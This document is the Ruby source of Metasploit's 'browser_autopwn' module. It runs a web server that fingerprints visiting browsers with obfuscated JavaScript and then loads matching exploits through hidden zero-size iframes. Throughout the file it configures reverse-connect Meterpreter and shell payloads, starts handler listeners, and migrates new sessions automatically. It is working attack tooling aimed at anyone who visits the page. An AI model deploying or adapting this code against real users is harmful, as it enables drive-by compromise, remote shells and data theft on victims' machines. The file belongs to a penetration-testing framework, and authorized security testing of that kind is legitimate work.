metasploit-framework/modules/auxiliary/server/browser_autopwn.rb

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##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# ideas:
# - add a loading page option so the user can specify arbitrary html to
# insert all of the evil js and iframes into
# - caching is busted when different browsers come from the same IP
# - some kind of version comparison for each browser
# - is a generic comparison possible?
# 9.1 < 9.10 < 9.20b < 9.20
# 3.5-pre < 3.5 < 3.5.1
require 'msf/core'
require 'rex/exploitation/javascriptosdetect'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'HTTP Client Automatic Exploiter',
'Version' => '$Revision$',
'Description' => %q{
This module uses a combination of client-side and server-side
techniques to fingerprint HTTP clients and then automatically
exploit them.
},
'Author' =>
[
# initial concept, integration and extension of Jerome
# Athias' os_detect.js
'egypt',
],
'License' => BSD_LICENSE,
'Actions' =>
[
[ 'WebServer', {
'Description' => 'Start a bunch of modules and direct clients to appropriate exploits'
} ],
[ 'DefangedDetection', {
'Description' => 'Only perform detection, send no exploits'
} ],
[ 'list', {
'Description' => 'List the exploit modules that would be started'
} ]
],
'PassiveActions' =>
[ 'WebServer', 'DefangedDetection' ],
'DefaultAction' => 'WebServer'))
register_options([
OptAddress.new('LHOST', [true,
'The IP address to use for reverse-connect payloads'
]),
], self.class)
register_advanced_options([
# We know that most of these exploits will crash the browser, so
# set the default to run migrate right away if possible.
OptString.new('InitialAutoRunScript', [false, "An initial script to run on session created (before AutoRunScript)", 'migrate -f']),
OptString.new('AutoRunScript', [false, "A script to automatically on session creation.", '']),
OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
OptString.new('MATCH', [false,
'Only attempt to use exploits whose name matches this regex'
]),
OptString.new('EXCLUDE', [false,
'Only attempt to use exploits whose name DOES NOT match this regex'
]),
OptBool.new('DEBUG', [false,
'Do not obfuscate the javascript and print various bits of useful info to the browser',
false
]),
OptPort.new('LPORT_WIN32', [false,
'The port to use for Windows reverse-connect payloads, default is 3333'
]),
OptPort.new('LPORT_LINUX', [false,
'The port to use for Linux reverse-connect payloads, default is 4444'
]),
OptPort.new('LPORT_MAC', [false,
'The port to use for Mac reverse-connect payloads, default is 5555'
]),
OptPort.new('LPORT_GENERIC', [false,
'The port to use for generic reverse-connect payloads, default is 6666'
]),
], self.class)
@exploits = Hash.new
@payloads = Hash.new
@targetcache = Hash.new
@current_victim = Hash.new
end
def run
if (action.name == 'list')
m_regex = datastore["MATCH"] ? %r{#{datastore["MATCH"]}} : %r{}
e_regex = datastore["EXCLUDE"] ? %r{#{datastore["EXCLUDE"]}} : %r{^$}
framework.exploits.each_module do |name, mod|
if (mod.respond_to?("autopwn_opts") and name =~ m_regex and name !~ e_regex)
@exploits[name] = nil
print_line name
end
end
print_line
print_status("Found #{@exploits.length} exploit modules")
elsif (action.name == 'DefangedDetection')
exploit()
else
start_exploit_modules()
if @exploits.length < 1
print_error("No exploits, check your MATCH and EXCLUDE settings")
return false
end
exploit()
end
end
def setup
@init_js = ::Rex::Exploitation::ObfuscateJS.new
@init_js << <<-ENDJS
#{js_os_detect}
#{js_base64}
function make_xhr() {
var xhr;
try {
xhr = new XMLHttpRequest();
} catch(e) {
try {
xhr = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if (! xhr) {
throw "failed to create XMLHttpRequest";
}
return xhr;
}
function report_and_get_exploits(detected_version) {
var encoded_detection;
xhr = make_xhr();
xhr.onreadystatechange = function () {
if (xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
eval(xhr.responseText);
}
};
encoded_detection = new String();
#{js_debug('navigator.userAgent+"<br><br>"')}
for (var prop in detected_version) {
#{js_debug('prop + " " + detected_version[prop] +"<br>"')}
encoded_detection += detected_version[prop] + ":";
}
//#{js_debug('encoded_detection + "<br>"')}
encoded_detection = Base64.encode(encoded_detection);
xhr.open("GET", document.location + "?sessid=" + encoded_detection);
xhr.send(null);
}
function bodyOnLoad() {
var detected_version = getVersion();
//#{js_debug('detected_version')}
report_and_get_exploits(detected_version);
} // function bodyOnLoad
ENDJS
opts = {
'Symbols' => {
'Variables' => [
'xhr',
'encoded_detection',
],
'Methods' => [
'report_and_get_exploits',
'handler',
'bodyOnLoad',
]
},
'Strings' => true,
}
@init_js.update_opts(opts)
@init_js.update_opts(js_os_detect.opts)
@init_js.update_opts(js_base64.opts)
if (datastore['DEBUG'])
print_status("Adding debug code")
@init_js << <<-ENDJS
if (!(typeof(debug) == 'function')) {
function htmlentities(str) {
str = str.replace(/>/g, '&gt;');
str = str.replace(/</g, '&lt;');
str = str.replace(/&/g, '&amp;');
return str;
}
function debug(msg) {
document.body.innerHTML += (msg + "<br />\\n");
}
}
ENDJS
else
@init_js.obfuscate()
end
#@init_js << "window.onload = #{@init_js.sym("bodyOnLoad")};";
@init_html = "<html > <head > <title > Loading </title>\n"
@init_html << '<script language="javascript" type="text/javascript">'
@init_html << "<!-- \n #{@init_js} //-->"
@init_html << "</script> </head> "
@init_html << "<body onload=\"#{@init_js.sym("bodyOnLoad")}()\"> "
@init_html << "<noscript> \n"
# Don't use build_iframe here because it will break detection in
# DefangedDetection mode when the target has js disabled.
@init_html << "<iframe src=\"#{self.get_resource}?ns=1\"></iframe>"
@init_html << "</noscript> \n"
@init_html << "</body> </html> "
#
# I'm still not sold that this is the best way to do this, but random
# LPORTs causes confusion when things break and breakage when firewalls
# are in the way. I think the ideal solution is to have
# self-identifying payloads so we'd only need 1 LPORT for multiple
# stagers.
#
@win_lport = datastore['LPORT_WIN32'] || 3333
@lin_lport = datastore['LPORT_LINUX'] || 4444
@osx_lport = datastore['LPORT_MACOS'] || 5555
@gen_lport = datastore['LPORT_GENERIC'] || 6666
@java_lport = datastore['LPORT_JAVA'] || 7777
minrank = framework.datastore['MinimumRank'] || 'manual'
if not RankingName.values.include?(minrank)
print_error("MinimumRank invalid! Possible values are (#{RankingName.sort.map{|r|r[1]}.join("|")})")
wlog("MinimumRank invalid, ignoring", 'core', LEV_0)
end
@minrank = RankingName.invert[minrank]
end
def init_exploit(name, mod = nil, targ = 0)
if mod.nil?
@exploits[name] = framework.modules.create(name)
else
@exploits[name] = mod.new
end
apo = @exploits[name].class.autopwn_opts
if (apo[:rank] < @minrank)
@exploits.delete(name)
return false
end
case name
when %r{windows}
payload='windows/meterpreter/reverse_tcp'
lport = @win_lport
#when %r{linux}
# Some day...
#payload='linux/meterpreter/reverse_tcp'
#when %r{osx}
# Some day...
#payload='osx/meterpreter/reverse_tcp'
# We need to check that it's /java_ instead of just java since it would
# clash with things like mozilla_navigatorjava. Better would be to
# check the actual platform of the module here but i'm lazy.
when %r{/java_}
payload='java/meterpreter/reverse_tcp'
lport = @java_lport
else
lport = @gen_lport
payload='generic/shell_reverse_tcp'
end
@payloads[lport] = payload
print_status("Starting exploit #{name} with payload #{payload}")
@exploits[name].datastore['SRVHOST'] = datastore['SRVHOST']
@exploits[name].datastore['SRVPORT'] = datastore['SRVPORT']
# For testing, set the exploit uri to the name of the exploit so it's
# easy to tell what is happening from the browser.
if (datastore['DEBUG'])
@exploits[name].datastore['URIPATH'] = name
else
@exploits[name].datastore['URIPATH'] = nil
end
@exploits[name].datastore['LPORT'] = lport
@exploits[name].datastore['LHOST'] = @lhost
@exploits[name].datastore['EXITFUNC'] = datastore['EXITFUNC'] || 'thread'
@exploits[name].datastore['DisablePayloadHandler'] = true
@exploits[name].exploit_simple(
'LocalInput' => self.user_input,
'LocalOutput' => self.user_output,
'Target' => targ,
'Payload' => payload,
'RunAsJob' => true)
# It takes a little time for the resources to get set up, so sleep for
# a bit to make sure the exploit is fully working. Without this,
# mod.get_resource doesn't exist when we need it.
Rex::ThreadSafe.sleep(0.5)
# Make sure this exploit got set up correctly, return false if it
# didn't
if framework.jobs[@exploits[name].job_id.to_s].nil?
print_error("Failed to start exploit module #{name}")
@exploits.delete(name)
return false
end
# Since r9714 or so, exploit_simple copies the module instead of
# operating on it directly when creating a job. Put the new copy into
# our list of running exploits so we have access to its state. This
# allows us to get the correct URI for each exploit in the same manor
# as before, using mod.get_resource().
@exploits[name] = framework.jobs[@exploits[name].job_id.to_s].ctx[0]
return true
end
def start_exploit_modules()
@lhost = (datastore['LHOST'] || "0.0.0.0")
@js_tests = {}
@noscript_tests = {}
print_line
print_status("Starting exploit modules on host #{@lhost}...")
print_status("---")
print_line
m_regex = datastore["MATCH"] ? %r{#{datastore["MATCH"]}} : %r{}
e_regex = datastore["EXCLUDE"] ? %r{#{datastore["EXCLUDE"]}} : %r{^$}
framework.exploits.each_module do |name, mod|
if (mod.respond_to?("autopwn_opts") and name =~ m_regex and name !~ e_regex)
next if !(init_exploit(name))
apo = mod.autopwn_opts.dup
apo[:name] = name.dup
apo[:vuln_test] ||= ""
if apo[:classid]
# Then this is an IE exploit that uses an ActiveX control,
# build the appropriate tests for it.
method = apo[:vuln_test].dup
apo[:vuln_test] = ""
apo[:ua_name] = HttpClients::IE
if apo[:classid].kind_of?(Array) # then it's many classids
apo[:classid].each { |clsid|
apo[:vuln_test] << "if (testAXO('#{clsid}', '#{method}')) {\n"
apo[:vuln_test] << " is_vuln = true;\n"
apo[:vuln_test] << "}\n"
}
else
apo[:vuln_test] << "if (testAXO('#{apo[:classid]}', '#{method}')) {\n"
apo[:vuln_test] << " is_vuln = true;\n"
apo[:vuln_test] << "}\n"
end
end
if apo[:ua_minver] and apo[:ua_maxver]
ver_test =
"!ua_ver_lt(detected_version.#{@init_js.sym("ua_version")}, '#{apo[:ua_minver]}') && " +
"!ua_ver_gt(detected_version.#{@init_js.sym("ua_version")}, '#{apo[:ua_maxver]}')"
elsif apo[:ua_minver]
ver_test = "!ua_ver_lt(detected_version.#{@init_js.sym("ua_version")}, '#{apo[:ua_minver]}')\n"
elsif apo[:ua_maxver]
ver_test = "!ua_ver_gt(detected_version.#{@init_js.sym("ua_version")}, '#{apo[:ua_maxver]}')\n"
else
ver_test = "true"
end
test = "if (#{ver_test}) { "
test << (apo[:vuln_test].empty? ? "is_vuln = true;" : apo[:vuln_test])
test << "} else { is_vuln = false; }\n"
apo[:vuln_test] = test
# Now that we've got all of our exploit tests put together,
# organize them into requires-scripting and
# doesnt-require-scripting, sorted by browser name.
if apo[:javascript] && apo[:ua_name]
@js_tests[apo[:ua_name]] ||= []
@js_tests[apo[:ua_name]].push(apo)
elsif apo[:javascript]
@js_tests["generic"] ||= []
@js_tests["generic"].push(apo)
elsif apo[:ua_name]
@noscript_tests[apo[:ua_name]] ||= []
@noscript_tests[apo[:ua_name]].push(apo)
else
@noscript_tests["generic"] ||= []
@noscript_tests["generic"].push(apo)
end
end
end
# start handlers for each type of payload
[@win_lport, @lin_lport, @osx_lport, @gen_lport, @java_lport].each do |lport|
if (lport and @payloads[lport])
print_status("Starting handler for #{@payloads[lport]} on port #{lport}")
multihandler = framework.modules.create("exploit/multi/handler")
multihandler.datastore['LPORT'] = lport
multihandler.datastore['LHOST'] = @lhost
multihandler.datastore['ExitOnSession'] = false
multihandler.datastore['EXITFUNC'] = datastore['EXITFUNC'] || 'thread'
# XXX: Revisit this when we have meterpreter working on more than just windows
if (lport == @win_lport)
multihandler.datastore['AutoRunScript'] = datastore['AutoRunScript']
multihandler.datastore['AutoSystemInfo'] = datastore['AutoSystemInfo']
multihandler.datastore['InitialAutoRunScript'] = datastore['InitialAutoRunScript']
end
multihandler.exploit_simple(
'LocalInput' => self.user_input,
'LocalOutput' => self.user_output,
'Payload' => @payloads[lport],
'RunAsJob' => true)
end
end
# let the handlers get set up
Rex::ThreadSafe.sleep(0.5)
print_line
print_status("--- Done, found %bld%grn#{@exploits.length}%clr exploit modules")
print_line
# Sort the tests by reliability, descending.
@js_tests.each { |browser,tests|
tests.sort! {|a,b| b[:rank] <=> a[:rank]}
}
@noscript_tests.each { |browser,tests|
tests.sort! {|a,b| b[:rank] <=> a[:rank]}
}
end
def on_request_uri(cli, request)
print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}")
case request.uri
when self.get_resource
# This is the first request. Send the javascript fingerprinter and
# hope it sends us back some data. If it doesn't, javascript is
# disabled on the client and we will have to do a lot more
# guessing.
response = create_response()
response["Expires"] = "0"
response["Cache-Control"] = "must-revalidate"
response.body = @init_html
cli.send_response(response)
when %r{^#{self.get_resource}.*sessid=}
# This is the request for the exploit page when javascript is
# enabled. Includes the results of the javascript fingerprinting
# in the "sessid" parameter as a base64 encoded string.
record_detection(cli, request)
if (action.name == "DefangedDetection")
response = create_response()
response.body = "Please wait"
else
print_status("Responding with exploits")
response = build_script_response(cli, request)
end
cli.send_response(response)
when %r{^#{self.get_resource}.*ns=1}
# This is the request for the exploit page when javascript is NOT
# enabled. Since scripting is disabled, fall back to useragent
# detection, which is kind of a bummer since it's so easy for the
# ua string to lie. It probably doesn't matter that much because
# most of our exploits require javascript anyway.
print_status("Browser has javascript disabled, trying exploits that don't need it")
record_detection(cli, request)
if (action.name == "DefangedDetection")
response = create_response()
response.body = "Please wait"
else
print_status("Responding with non-javascript exploits")
response = build_noscript_response(cli, request)
end
response["Expires"] = "0"
response["Cache-Control"] = "must-revalidate"
cli.send_response(response)
else
print_status("404ing #{request.uri}")
send_not_found(cli)
return false
end
end
def build_noscript_html(cli, request)
client_info = get_client(:host => cli.peerhost, :ua_string => request['User-Agent'])
body = ""
@noscript_tests.each { |browser, sploits|
next if sploits.length == 0
# If client_info is nil then get_client failed and we have no
# knowledge of this client, so we can't assume anything about their
# browser. If the exploit does not specify a browser target, that
# means it it is generic and will work anywhere (or at least be
# able to autodetect). If the currently connected client's ua_name
# is nil, then the fingerprinting didn't work for some reason.
# Lastly, check to see if the client's browser matches the browser
# targetted by this group of exploits. In all of these cases, we
# need to send all the exploits in the list.
if not(client_info && browser && [nil, browser].include?(client_info[:ua_name]))
if (HttpClients::IE == browser)
body << "<!--[if IE]>\n"
end
sploits.map do |s|
body << (s[:prefix_html] || "") + "\n"
body << build_iframe(exploit_resource(s[:name])) + "\n"
body << (s[:postfix_html] || "") + "\n"
end
if (HttpClients::IE == browser)
body << "<![endif]-->\n"
end
end
}
body
end
def build_noscript_response(cli, request)
response = create_response()
response['Expires'] = '0'
response['Cache-Control'] = 'must-revalidate'
response.body = "<html > <head > <title > Loading </title> </head> "
response.body << "<body> "
response.body << "Please wait "
response.body << build_noscript_html(cli, request)
response.body << "</body> </html> "
return response
end
def build_script_response(cli, request)
response = create_response()
response['Expires'] = '0'
response['Cache-Control'] = 'must-revalidate'
host_info = get_host(:host => cli.peerhost)
client_info = get_client(:host => cli.peerhost, :ua_string => request['User-Agent'])
#print_status("Client info: #{client_info.inspect}")
js = ::Rex::Exploitation::ObfuscateJS.new
# If we didn't get a client from the database, then the detection
# is borked or the db is not connected, so fallback to sending
# some IE-specific stuff with everything. Do the same if the
# exploit didn't specify a client. Otherwise, make sure this is
# IE before sending code for ActiveX checks.
if (client_info.nil? || [nil, HttpClients::IE].include?(client_info[:ua_name]))
# If we have a class name (e.g.: "DirectAnimation.PathControl"),
# use the simple and direct "new ActiveXObject()". If we
# have a classid instead, first try creating the object
# with createElement("object"). However, some things
# don't like being created this way (specifically winzip),
# so try writing out an object tag as well. One of these
# two methods should succeed if the object with the given
# classid can be created.
js << <<-ENDJS
function testAXO(axo_name, method) {
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
axobj = document.createElement("object");
axobj.setAttribute("classid", "clsid:" + axo_name);
axobj.setAttribute("id", axo_name);
axobj.setAttribute("style", "visibility: hidden");
axobj.setAttribute("width", "0px");
axobj.setAttribute("height", "0px");
document.body.appendChild(axobj);
if (typeof(axobj[method]) == 'undefined') {
var attributes = 'id="' + axo_name + '"';
attributes += ' classid="clsid:' + axo_name + '"';
attributes += ' style="visibility: hidden"';
attributes += ' width="0px" height="0px"';
document.body.innerHTML += "<object " + attributes + "></object>";
axobj = document.getElementById(axo_name);
}
} else {
try {
axobj = new ActiveXObject(axo_name);
} catch(e) {
axobj = '';
};
}
#{js_debug('axo_name + "." + method + " = " + typeof axobj[method] + "<br/>"')}
if (typeof(axobj[method]) != 'undefined') {
return true;
}
return false;
}
ENDJS
# End of IE-specific test functions
end
# Generic stuff that is needed regardless of what browser was detected.
js << <<-ENDJS
var written_iframes = new Array();
function write_iframe(myframe) {
var iframe_idx; var mybody;
for (iframe_idx in written_iframes) {
if (written_iframes[iframe_idx] == myframe) {
return;
}
}
written_iframes[written_iframes.length] = myframe;
str = '';
str += '<iframe src="' + myframe + '" style="visibility:hidden" height="0" width="0" border="0"></iframe>';
#{datastore['DEBUG'] ? "str += '<p>' + myframe + '</p>'" : ""};
document.body.innerHTML += (str);
}
var global_exploit_list = [];
function next_exploit(exploit_idx) {
if (!global_exploit_list[exploit_idx]) {
return;
}
// Wrap all of the vuln tests in a try-catch block so a
// single borked test doesn't prevent other exploits
// from working.
try {
var test = global_exploit_list[exploit_idx].test;
if (!test) {
test = "true";
} else {
test = "try {" + test + "} catch (e) { is_vuln = false; }; is_vuln";
}
//alert("next_exploit(" + (exploit_idx).toString() + ") => " +
// global_exploit_list[exploit_idx].resource + "\\n" +
// test + " -- " + eval(test)
//);
if (eval(test)) {
write_iframe(global_exploit_list[exploit_idx].resource);
setTimeout("next_exploit(" + (exploit_idx+1).toString() + ")", 1000);
} else {
#{js_debug("'this client does not appear to be vulnerable to ' + global_exploit_list[exploit_idx].resource + '<br>'")}
next_exploit(exploit_idx+1);
}
} catch(e) {
next_exploit(exploit_idx+1);
};
}
ENDJS
opts = {
'Symbols' => {
'Variables' => [
'written_iframes',
'myframe',
'mybody',
'iframe_idx',
'is_vuln',
'global_exploit_list',
'exploit_idx',
],
'Methods' => [
'write_iframe',
'next_exploit',
]
},
'Strings' => true,
}
@js_tests.each { |browser, sploits|
next if sploits.length == 0
if (client_info.nil? || [nil, browser, "generic"].include?(client_info[:ua_name]))
# Make sure the browser names can be used as an identifier in
# case something wacky happens to them.
func_name = "exploit#{browser.gsub(/[^a-zA-Z]/, '')}"
js << "function #{func_name}() { \n"
sploits.map do |s|
# get rid of newlines and escape quotes
test = s[:vuln_test].gsub("\n",'').gsub("'", "\\\\'")
# shouldn't be any in the resource, but just in case...
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
# Skip exploits that don't match the client's OS.
if (host_info and host_info[:os_name] and s[:os_name])
next unless s[:os_name].include?(host_info[:os_name])
end
js << " global_exploit_list[global_exploit_list.length] = {\n"
if test and not test.empty?
js << " 'test':'#{test}',\n"
else
js << " 'test':'is_vuln = true;',\n"
end
js << " 'resource':'#{res}'\n"
js << " };\n"
end
js << "};\n" # end function exploit...()
js << "#{js_debug("'exploit func: #{func_name}()<br>'")}\n"
js << "#{func_name}();\n" # run that bad boy
opts['Symbols']['Methods'].push("#{func_name}")
end
}
js << "var noscript_exploits = \""
js << Rex::Text.to_hex(build_noscript_html(cli, request), "%")
js << "\";"
js << 'noscript_div = document.createElement("div");'
js << "noscript_div.innerHTML = unescape(noscript_exploits);"
js << "document.body.appendChild(noscript_div);"
#js << "document.write(\"<div>\" + noscript_exploits);"
opts['Symbols']['Methods'].push("noscript_exploits")
opts['Symbols']['Methods'].push("noscript_div")
js << "#{js_debug("'starting exploits<br>'")}\n"
js << "next_exploit(0);\n"
if not datastore['DEBUG']
js.obfuscate
end
response.body = "#{js}"
return response
end
# consider abstracting this out to a method (probably
# with a different name) of Auxiliary::Report or
# Exploit::Remote::HttpServer
def record_detection(cli, request)
os_name = nil
os_flavor = nil
os_sp = nil
os_lang = nil
arch = nil
ua_name = nil
ua_ver = nil
data_offset = request.uri.index('sessid=')
#p request['User-Agent']
if (data_offset.nil? or -1 == data_offset)
# then we didn't get a report back from our javascript
# detection; make a best guess effort from information
# in the user agent string. The OS detection should be
# roughly the same as the javascript version on non-IE
# browsers because it does most everything with
# navigator.userAgent
print_status("Recording detection from User-Agent: #{request['User-Agent']}")
report_user_agent(cli.peerhost, request)
else
data_offset += 'sessid='.length
detected_version = request.uri[data_offset, request.uri.length]
if (0 < detected_version.length)
detected_version = Rex::Text.decode_base64(Rex::Text.uri_decode(detected_version))
print_status("JavaScript Report: #{detected_version}")
(os_name, os_flavor, os_sp, os_lang, arch, ua_name, ua_ver) = detected_version.split(':')
if framework.db.active
host_info = { :host => cli.peerhost }
host_info[:os_name] = os_name if os_name != "undefined"
host_info[:os_flavor] = os_flavor if os_flavor != "undefined"
host_info[:os_sp] = os_sp if os_sp != "undefined"
host_info[:os_lang] = os_lang if os_lang != "undefined"
host_info[:arch] = arch if arch != "undefined"
report_host(host_info)
client_info = ({
:host => cli.peerhost,
:ua_string => request['User-Agent'],
:ua_name => ua_name,
:ua_ver => ua_ver
})
report_client(client_info)
end
end
end
# Always populate the target cache since querying the database is too
# slow for real-time.
key = cli.peerhost + request['User-Agent']
@targetcache ||= {}
@targetcache[key] ||= {}
@targetcache[key][:updated_at] = Time.now.to_i
# Clean the cache
rmq = []
@targetcache.each_key do |addr|
if (Time.now.to_i > @targetcache[addr][:updated_at]+60)
rmq.push addr
end
end
rmq.each {|addr| @targetcache.delete(addr) }
# Keep the attributes the same as if it were created in
# the database.
@targetcache[key][:updated_at] = Time.now.to_i
@targetcache[key][:ua_string] = request['User-Agent']
@targetcache[key][:ua_name] = ua_name
@targetcache[key][:ua_ver] = ua_ver
end
# Override super#get_client to use a cache since the database is generally
# too slow to be useful for realtime tasks. This essentially creates an
# in-memory database. The upside is that it works if the database is
# broken (which seems to be all the time now).
def get_client(opts)
host = opts[:host]
return @targetcache[opts[:host]+opts[:ua_string]]
end
def build_iframe(resource)
ret = ''
if (action.name == 'DefangedDetection')
ret << "<p>iframe #{resource}</p>"
else
ret << "<iframe src=\"#{resource}\" style=\"visibility:hidden\" height=\"0\" width=\"0\" border=\"0\"></iframe>"
#ret << "<iframe src=\"#{resource}\" ></iframe>"
end
return ret
end
def exploit_resource(name)
if (@exploits[name] && @exploits[name].respond_to?("get_resource"))
#print_line("Returning #{@exploits[name].get_resource.inspect}, for #{name}")
return @exploits[name].get_resource
else
print_error("Don't have an exploit by that name, returning 404#{name}.html")
return "404#{name}.html"
end
end
def js_debug(msg)
if datastore['DEBUG']
return "document.body.innerHTML += #{msg};"
end
return ""
end
end